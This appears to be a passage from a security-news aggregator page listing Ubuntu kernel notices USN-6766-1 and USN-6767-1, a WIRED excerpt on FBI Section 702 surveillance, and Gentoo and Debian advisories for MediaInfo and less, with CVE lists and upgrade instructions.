attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - PowerPC architecture;   - S390 architecture;   - Core kernel;   - Block layer subsystem;   - Android drivers;   - Power management core;   - Bus devices;   - Hardware random number generator core;   - Cryptographic API;   - Device frequency;   - DMA engine subsystem;   - ARM SCMI message protocol;   - GPU drivers;   - HID subsystem;   - Hardware monitoring drivers;   - I2C subsystem;   - IIO ADC drivers;   - IIO subsystem;   - IIO Magnetometer sensors drivers;   - InfiniBand drivers;   - Media drivers;   - Network drivers;   - PCI driver for MicroSemi Switchtec;   - PHY drivers;   - SCSI drivers;   - DesignWare USB3 driver;   - BTRFS file system;   - Ceph distributed file system;   - Ext4 file system;   - F2FS file system;   - JFS file system;   - NILFS2 file system;   - NTFS3 file system;   - Pstore file system;   - SMB network file system;   - Memory management;   - CAN network layer;   - Networking core;   - HSR network protocol;   - IPv4 networking;   - IPv6 networking;   - Logical Link layer;   - Multipath TCP;   - Netfilter;   - NFC subsystem;   - SMC sockets;   - Sun RPC protocol;   - TIPC protocol;   - Unix domain sockets;   - Realtek audio codecs;(CVE-2023-52594, CVE-2023-52601, CVE-2024-26826, CVE-2023-52622,CVE-2024-26665, CVE-2023-52493, CVE-2023-52633, CVE-2024-26684,CVE-2024-26663, CVE-2023-52618, CVE-2023-52588, CVE-2023-52637,CVE-2024-26825, CVE-2023-52606, CVE-2024-26594, CVE-2024-26625,CVE-2024-26720, CVE-2024-26614, CVE-2023-52627, CVE-2023-52602,CVE-2024-26673, CVE-2024-26685, CVE-2023-52638, CVE-2023-52498,CVE-2023-52619, CVE-2024-26910, CVE-2024-26689, CVE-2023-52583,CVE-2024-26676, CVE-2024-26671, CVE-2024-26704, CVE-2024-26608,CVE-2024-26610, CVE-2024-26592, CVE-2023-52599, CVE-2023-52595,CVE-2024-26660, CVE-2023-52617, CVE-2024-26645, CVE-2023-52486,CVE-2023-52631, CVE-2023-52607, CVE-2023-52608, CVE-2024-26722,CVE-2024-26615, CVE-2023-52615, CVE-2024-26636, CVE-2023-52642,CVE-2023-52587, CVE-2024-26712, CVE-2024-26675, CVE-2023-52614,CVE-2024-26606, CVE-2024-26916, CVE-2024-26600, CVE-2024-26679,CVE-2024-26829, CVE-2024-26641, CVE-2023-52623, CVE-2024-26627,CVE-2024-26696, CVE-2024-26640, CVE-2024-26635, CVE-2023-52491,CVE-2024-26664, CVE-2024-26602, CVE-2023-52604, CVE-2024-26717,CVE-2023-52643, CVE-2024-26593, CVE-2023-52598, CVE-2024-26668,CVE-2023-52435, CVE-2023-52597, CVE-2024-26715, CVE-2024-26707,CVE-2023-52635, CVE-2024-26695, CVE-2024-26698, CVE-2023-52494,CVE-2024-26920, CVE-2024-26808, CVE-2023-52616, CVE-2023-52492,CVE-2024-26702, CVE-2024-26644, CVE-2023-52489, CVE-2024-26697)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1044-gkeop   5.15.0-1044.51   linux-image-5.15.0-1054-ibm     5.15.0-1054.57   linux-image-5.15.0-1054-nvidia  5.15.0-1054.55   linux-image-5.15.0-1054-nvidia-lowlatency  5.15.0-1054.55   linux-image-5.15.0-1058-gke     5.15.0-1058.63   linux-image-5.15.0-1058-kvm     5.15.0-1058.63   linux-image-5.15.0-1059-gcp     5.15.0-1059.67   linux-image-5.15.0-1059-oracle  5.15.0-1059.65   linux-image-5.15.0-106-generic  5.15.0-106.116   linux-image-5.15.0-106-generic-64k  5.15.0-106.116   linux-image-5.15.0-106-generic-lpae  5.15.0-106.116   linux-image-5.15.0-106-lowlatency  5.15.0-106.116   linux-image-5.15.0-106-lowlatency-64k  5.15.0-106.116   linux-image-5.15.0-1063-azure   5.15.0-1063.72   linux-image-5.15.0-1063-azure-fde  5.15.0-1063.72.1   linux-image-azure-fde-lts-22.04  5.15.0.1063.72.41   linux-image-azure-lts-22.04     5.15.0.1063.61   linux-image-gcp-lts-22.04       5.15.0.1059.55   linux-image-generic             5.15.0.106.106   linux-image-generic-64k         5.15.0.106.106   linux-image-generic-lpae        5.15.0.106.106   linux-image-gke                 5.15.0.1058.57   linux-image-gke-5.15            5.15.0.1058.57   linux-image-gkeop               5.15.0.1044.43   linux-image-gkeop-5.15          5.15.0.1044.43   linux-image-ibm                 5.15.0.1054.50   linux-image-kvm                 5.15.0.1058.54   linux-image-lowlatency          5.15.0.106.101   linux-image-lowlatency-64k      5.15.0.106.101   linux-image-nvidia              5.15.0.1054.54   linux-image-nvidia-lowlatency   5.15.0.1054.54   linux-image-oracle-lts-22.04    5.15.0.1059.55   linux-image-virtual             5.15.0.106.106Ubuntu 20.04 LTS   linux-image-5.15.0-1044-gkeop   5.15.0-1044.51~20.04.1   linux-image-5.15.0-1054-ibm     5.15.0-1054.57~20.04.1   linux-image-5.15.0-1059-gcp     5.15.0-1059.67~20.04.1   linux-image-5.15.0-1059-oracle  5.15.0-1059.65~20.04.1   linux-image-5.15.0-106-lowlatency  5.15.0-106.116~20.04.1   linux-image-5.15.0-106-lowlatency-64k  5.15.0-106.116~20.04.1   linux-image-5.15.0-1063-azure   5.15.0-1063.72~20.04.1   linux-image-5.15.0-1063-azure-fde  5.15.0-1063.72~20.04.1.1   linux-image-azure               5.15.0.1063.72~20.04.1   linux-image-azure-cvm           5.15.0.1063.72~20.04.1   linux-image-azure-fde           5.15.0.1063.72~20.04.1.41   linux-image-gcp                 5.15.0.1059.67~20.04.1   linux-image-gkeop-5.15          5.15.0.1044.51~20.04.1   linux-image-ibm                 5.15.0.1054.57~20.04.1   linux-image-lowlatency-64k-hwe-20.04  5.15.0.106.116~20.04.1   linux-image-lowlatency-hwe-20.04  5.15.0.106.116~20.04.1   linux-image-oracle              5.15.0.1059.65~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6766-1   CVE-2023-52435, CVE-2023-52486, CVE-2023-52489, CVE-2023-52491,   CVE-2023-52492, CVE-2023-52493, CVE-2023-52494, CVE-2023-52498,   CVE-2023-52583, CVE-2023-52587, CVE-2023-52588, CVE-2023-52594,   CVE-2023-52595, CVE-2023-52597, CVE-2023-52598, CVE-2023-52599,   CVE-2023-52601, CVE-2023-52602, CVE-2023-52604, CVE-2023-52606,   CVE-2023-52607, CVE-2023-52608, CVE-2023-52614, CVE-2023-52615,   CVE-2023-52616, CVE-2023-52617, CVE-2023-52618, CVE-2023-52619,   CVE-2023-52622, CVE-2023-52623, CVE-2023-52627, CVE-2023-52631,   CVE-2023-52633, CVE-2023-52635, CVE-2023-52637, CVE-2023-52638,   CVE-2023-52642, CVE-2023-52643, CVE-2024-1151, CVE-2024-2201,   CVE-2024-23849, CVE-2024-26592, CVE-2024-26593, CVE-2024-26594,   CVE-2024-26600, CVE-2024-26602, CVE-2024-26606, CVE-2024-26608,   CVE-2024-26610, CVE-2024-26614, CVE-2024-26615, CVE-2024-26625,   CVE-2024-26627, CVE-2024-26635, CVE-2024-26636, CVE-2024-26640,   CVE-2024-26641, CVE-2024-26644, CVE-2024-26645, CVE-2024-26660,   CVE-2024-26663, CVE-2024-26664, CVE-2024-26665, CVE-2024-26668,   CVE-2024-26671, CVE-2024-26673, CVE-2024-26675, CVE-2024-26676,   CVE-2024-26679, CVE-2024-26684, CVE-2024-26685, CVE-2024-26689,   CVE-2024-26695, CVE-2024-26696, CVE-2024-26697, CVE-2024-26698,   CVE-2024-26702, CVE-2024-26704, CVE-2024-26707, CVE-2024-26712,   CVE-2024-26715, CVE-2024-26717, CVE-2024-26720, CVE-2024-26722,   CVE-2024-26808, CVE-2024-26825, CVE-2024-26826, CVE-2024-26829,   CVE-2024-26910, CVE-2024-26916, CVE-2024-26920Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-106.116   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1063.72   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1063.72.1   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1059.67   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1058.63   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1044.51   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1054.57   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1058.63   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-106.116   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1054.55   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1059.65   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1063.72~20.04.1 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1063.72~20.04.1.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1059.67~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1044.51~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1054.57~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-106.116~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1059.65~20.04.1

Ubuntu Security Notice USN-6766-1

Ubuntu Security Notice 6767-1 - Chenyuan Yang discovered that the RDS Protocol implementation in the Linux kernel contained an out-of-bounds read vulnerability. An attacker could use this to possibly cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6767-1May 07, 2024linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-gcp,linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi,linux-raspi-5.4, linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-iot: Linux kernel for IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - PowerPC architecture;   - S390 architecture;   - Block layer subsystem;   - Android drivers;   - Hardware random number generator core;   - GPU drivers;   - Hardware monitoring drivers;   - I2C subsystem;   - IIO Magnetometer sensors drivers;   - InfiniBand drivers;   - Network drivers;   - PCI driver for MicroSemi Switchtec;   - PHY drivers;   - Ceph distributed file system;   - Ext4 file system;   - JFS file system;   - NILFS2 file system;   - Pstore file system;   - Core kernel;   - Memory management;   - CAN network layer;   - Networking core;   - IPv4 networking;   - Logical Link layer;   - Netfilter;   - NFC subsystem;   - SMC sockets;   - Sun RPC protocol;   - TIPC protocol;   - Realtek audio codecs;(CVE-2024-26696, CVE-2023-52583, CVE-2024-26720, CVE-2023-52615,CVE-2023-52599, CVE-2023-52587, CVE-2024-26635, CVE-2024-26704,CVE-2024-26625, CVE-2024-26825, CVE-2023-52622, CVE-2023-52435,CVE-2023-52617, CVE-2023-52598, CVE-2024-26645, CVE-2023-52619,CVE-2024-26593, CVE-2024-26685, CVE-2023-52602, CVE-2023-52486,CVE-2024-26697, CVE-2024-26675, CVE-2024-26600, CVE-2023-52604,CVE-2024-26664, CVE-2024-26606, CVE-2023-52594, CVE-2024-26671,CVE-2024-26598, CVE-2024-26673, CVE-2024-26920, CVE-2024-26722,CVE-2023-52601, CVE-2024-26602, CVE-2023-52637, CVE-2023-52623,CVE-2024-26702, CVE-2023-52597, CVE-2024-26684, CVE-2023-52606,CVE-2024-26679, CVE-2024-26663, CVE-2024-26910, CVE-2024-26615,CVE-2023-52595, CVE-2023-52607, CVE-2024-26636)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.4.0-1036-iot      5.4.0-1036.37   linux-image-5.4.0-1043-xilinx-zynqmp  5.4.0-1043.47   linux-image-5.4.0-1071-ibm      5.4.0-1071.76   linux-image-5.4.0-1091-gkeop    5.4.0-1091.95   linux-image-5.4.0-1108-raspi    5.4.0-1108.120   linux-image-5.4.0-1112-kvm      5.4.0-1112.119   linux-image-5.4.0-1123-oracle   5.4.0-1123.132   linux-image-5.4.0-1124-aws      5.4.0-1124.134   linux-image-5.4.0-1128-gcp      5.4.0-1128.137   linux-image-5.4.0-1129-azure    5.4.0-1129.136   linux-image-5.4.0-181-generic   5.4.0-181.201   linux-image-5.4.0-181-generic-lpae  5.4.0-181.201   linux-image-5.4.0-181-lowlatency  5.4.0-181.201   linux-image-aws-lts-20.04       5.4.0.1124.121   linux-image-azure-lts-20.04     5.4.0.1129.123   linux-image-gcp-lts-20.04       5.4.0.1128.130   linux-image-generic             5.4.0.181.179   linux-image-generic-lpae        5.4.0.181.179   linux-image-gkeop               5.4.0.1091.89   linux-image-gkeop-5.4           5.4.0.1091.89   linux-image-ibm-lts-20.04       5.4.0.1071.100   linux-image-kvm                 5.4.0.1112.108   linux-image-lowlatency          5.4.0.181.179   linux-image-oem                 5.4.0.181.179   linux-image-oem-osp1            5.4.0.181.179   linux-image-oracle-lts-20.04    5.4.0.1123.116   linux-image-raspi               5.4.0.1108.138   linux-image-raspi2              5.4.0.1108.138   linux-image-virtual             5.4.0.181.179   linux-image-xilinx-zynqmp       5.4.0.1043.43Ubuntu 18.04 LTS   linux-image-5.4.0-1071-ibm      5.4.0-1071.76~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1108-raspi    5.4.0-1108.120~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1123-oracle   5.4.0-1123.132~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1124-aws      5.4.0-1124.134~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1128-gcp      5.4.0-1128.137~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1129-azure    5.4.0-1129.136~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-181-generic   5.4.0-181.201~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-181-lowlatency  5.4.0-181.201~18.04.1                                   Available with Ubuntu Pro   linux-image-aws                 5.4.0.1124.134~18.04.1                                   Available with Ubuntu Pro   linux-image-azure               5.4.0.1129.136~18.04.1                                   Available with Ubuntu Pro   linux-image-gcp                 5.4.0.1128.137~18.04.1                                   Available with Ubuntu Pro   linux-image-generic-hwe-18.04   5.4.0.181.201~18.04.1                                   Available with Ubuntu Pro   linux-image-ibm                 5.4.0.1071.76~18.04.1                                   Available with Ubuntu Pro   linux-image-lowlatency-hwe-18.04  5.4.0.181.201~18.04.1                                   Available with Ubuntu Pro   linux-image-oem                 5.4.0.181.201~18.04.1                                   Available with Ubuntu Pro   linux-image-oem-osp1            5.4.0.181.201~18.04.1                                   Available with Ubuntu Pro   linux-image-oracle              5.4.0.1123.132~18.04.1                                   Available with Ubuntu Pro   linux-image-raspi-hwe-18.04     5.4.0.1108.120~18.04.1                                   Available with Ubuntu Pro   linux-image-snapdragon-hwe-18.04  5.4.0.181.201~18.04.1                                   Available with Ubuntu Pro   linux-image-virtual-hwe-18.04   5.4.0.181.201~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6767-1   CVE-2023-52435, CVE-2023-52486, CVE-2023-52583, CVE-2023-52587,   CVE-2023-52594, CVE-2023-52595, CVE-2023-52597, CVE-2023-52598,   CVE-2023-52599, CVE-2023-52601, CVE-2023-52602, CVE-2023-52604,   CVE-2023-52606, CVE-2023-52607, CVE-2023-52615, CVE-2023-52617,   CVE-2023-52619, CVE-2023-52622, CVE-2023-52623, CVE-2023-52637,   CVE-2024-23849, CVE-2024-26593, CVE-2024-26598, CVE-2024-26600,   CVE-2024-26602, CVE-2024-26606, CVE-2024-26615, CVE-2024-26625,   CVE-2024-26635, CVE-2024-26636, CVE-2024-26645, CVE-2024-26663,   CVE-2024-26664, CVE-2024-26671, CVE-2024-26673, CVE-2024-26675,   CVE-2024-26679, CVE-2024-26684, CVE-2024-26685, CVE-2024-26696,   CVE-2024-26697, CVE-2024-26702, CVE-2024-26704, CVE-2024-26720,   CVE-2024-26722, CVE-2024-26825, CVE-2024-26910, CVE-2024-26920Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-181.201   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1124.134   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1129.136   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1128.137   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1091.95   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1071.76   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1036.37   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1112.119   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1123.132   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1108.120   https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1043.47

Ubuntu Security Notice USN-6767-1

An internal email from FBI deputy director Paul Abbate, obtained by WIRED, tells employees to search for “US persons” in a controversial spy program's database that investigators have repeatedly misused.

House Intelligence Committee chair Mike Turner and ranking member Jim Himes blasted out invitations announcing a “bipartisan celebration” of the 702 program’s continuation last week. The event, which the lawmakers have dubbed FISA Fest, is being held in a reception room in the US Capitol building Wednesday night.

A House Intelligence Committee spokesperson did not respond to a request for comment.

Turner and Himes were instrumental in preserving the FBI’s warrantless access to 702 data. In countless “briefings” since October, the pair urged members of their respective parties to avoid reining in the FBI’s authority too greatly. Instead, the new procedures designed by the bureau itself were touted by both lawmakers as a sufficient bulwark against further abuse.

Narrowly winning that battle last month, Himes and Turner worked to kill an amendment that would have forced FBI employees to get search warrants before reviewing the communications of Americans swept up by the program. (The amendment, opposed by the Biden White House, failed in a tie vote, 212-212.) Instead, the FBI’s procedures, now part of the 702 statute, require employees to affirmatively “opt in” before accessing the wiretaps. They must also seek permission from an FBI attorney before conducting “batch queries” of the database. And queries for communications of elected officials, reporters, academics, and religious figures are now all deemed “sensitive” and require approval from higher up the chain of command.

Congress established Section 702 in 2008 to legitimize an existing surveillance program run by the National Security Agency (NSA) without congressional oversight or approval. The program, more narrowly defined at the time, intercepted communications that were at least partly domestic but included a target the government believed was a known terrorist. While bringing the surveillance under its authority, Congress has helped to steadily expand the scope of the surveillance to encompass a new slate of threats, from cybercrime and drug trafficking to arms proliferation.

While advocates for 702 surveillance often imply that Americans who are wiretapped are communicating with terrorists—a concoction that Turner himself repeatedly lent credence to this year—the allegation is dubious. Officially, it is the US government’s position that it is impossible to know which US citizens are being surveilled or even how many of them there are. The chief aim of the 702 program is to acquire “foreign intelligence information,” a term that encompasses not only terrorism and acts of sabotage but information necessary for the government to conduct its own “foreign affairs.”

Surveillance critics worry that the array of possible targets extends far beyond what is being characterized in unclassified settings. It is uncontroversial to suggest that the US government—like all governments with the power to spy—finds reasons to spy on foreign allies, businesses, even news publications. So long as the target is foreign, they have no privacy rights.

The limits of the 702 program remain murky, even to congressional members insisting that it should not be curbed further. The Senate Intelligence Committee chair, Mark Warner, acknowledged to reporters this week that language in Section 702 needs to be “fixed,” even though he voted last month to make the current language law.

FISA experts had warned for months that new language introduced by the House Intelligence Committee is far too vague in the way it describes the categories of businesses the US government can compel, fearing that the government would obtain the power to force anyone with access to a target’s online communications into snooping on the NSA’s behalf—IT workers and data center staff among them.

A trade group representing Google, Amazon, IBM, and Microsoft, among some of the world's other largest technology companies, concurred last month, arguing that the new version of the surveillance program threatens to “dramatically expand the scope of entities and individuals” subject to Section 702 orders.

“We are working on it,” Warner told The Record on Monday. “I am absolutely committed to getting that fixed,” he said, suggesting the best time to do so would be “in the next intelligence bill.”

_Updated at 6:18 pm ET, May 8, 2024: Added comments from the FBI._

Top FBI Official Urges Agents to Use Warrantless Wiretaps on US Soil

Gentoo Linux Security Advisory 202405-9 - Multiple vulnerabilities have been found in MediaInfo and MediaInfoLib, the worst of which could allow user-assisted remote code execution. Versions greater than or equal to 23.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: MediaInfo, MediaInfoLib: Multiple Vulnerabilities  
     Date: May 04, 2024  
     Bugs: #778992, #836564, #875374, #917612  
       ID: 202405-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in MediaInfo and MediaInfoLib,  
the worst of which could allow user-assisted remote code execution.

Background  
=========  
MediaInfo supplies technical and tag information about media files.  
MediaInfoLib contains MediaInfo libraries.

Affected packages  
================  
Package                  Vulnerable    Unaffected  
-----------------------  ------------  ------------  
media-libs/libmediainfo  < 23.10       >= 23.10  
media-video/mediainfo    < 23.10       >= 23.10

Description  
==========  
Multiple vulnerabilities have been discovered in MediaInfo and  
MediaInfoLib. Please review the CVE identifiers referenced below for  
details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All MediaInfo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-video/mediainfo-23.10"

All MediaInfolib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libmediainfo-23.10"

References  
=========

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-09

Debian Linux Security Advisory 5679-1 - Several vulnerabilities were discovered in less, a file pager, which may result in the execution of arbitrary commands if a file with a specially crafted file name is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5679-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMay 03, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : lessCVE ID         : CVE-2022-48624 CVE-2024-32487Debian Bug     : 1064293 1068938 1069681Several vulnerabilities were discovered in less, a file pager, which mayresult in the execution of arbitrary commands if a file with a speciallycrafted file name is processed.For the oldstable distribution (bullseye), these problems have been fixedin version 551-2+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 590-2.1~deb12u2.We recommend that you upgrade your less packages.For the detailed security status of less please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/lessFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmY1UxpfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Rt9Q//RATJdOip2H457Vmye1lZb/mUKci2CJBtj5/JOE1MVH8B0w/Vv5EIWCCaMaBzfq3Wv9FmkLMIkfLp1IbM1KZ20+tVz9rz2tVHq0vp+fSjw8wurBv4AoFiRyI8pFwTzXEtwWVPVBhsquvOXLNVuOyNBq4fmAc8ETccvhcm9rODsEh4gxKR/BURJxPFjckpSv2EnEx/EEwSdFCaeJ5mjGDVN+Sd4V1LldyDLGCbRfY0RuC1hzGsX99o5NZ9IEt2ZNQ+9OVQQCcpC6ayKtOkPFGKcRKTxhWZ2Q2gNl6tb0bYaQygHlxxRhiqok3Gli898tnb+nI/ZlksblIn6gUwEzBH2a5P0/LJg4iF/N1htz2fv1C+/C8/AVvE9iBrlTV7RAo1xaIuV4yAgFsv+XJ7YsWtJKSwXkSRHAlcU3OGNmtQUxs6iQUrRJ97ax9L0O/3wh7dXbmkU42EZlybTxYh7eMi074PzLva7t0im8KwC5sjvH7yLe6jLXCJ2+Kx4apKfxPwTYn0bBqaeNgBBFHWwlYn+Rkofo4N5VdbFDWaMwctZ2FFLrpn3LQ3Mojnssgf/uchU1M8Vpjp01H3Jr0S97nz5cCwE+LlFddMNVlqNL/hA1xU8zNkyRLJcFaiJQVhtvLmuSFOW+FtvTjBB09T3o8lbPKYHacO1/h8/ZB+TKqlwQo=tUOa-----END PGP SIGNATURE-----

Tag

#ibm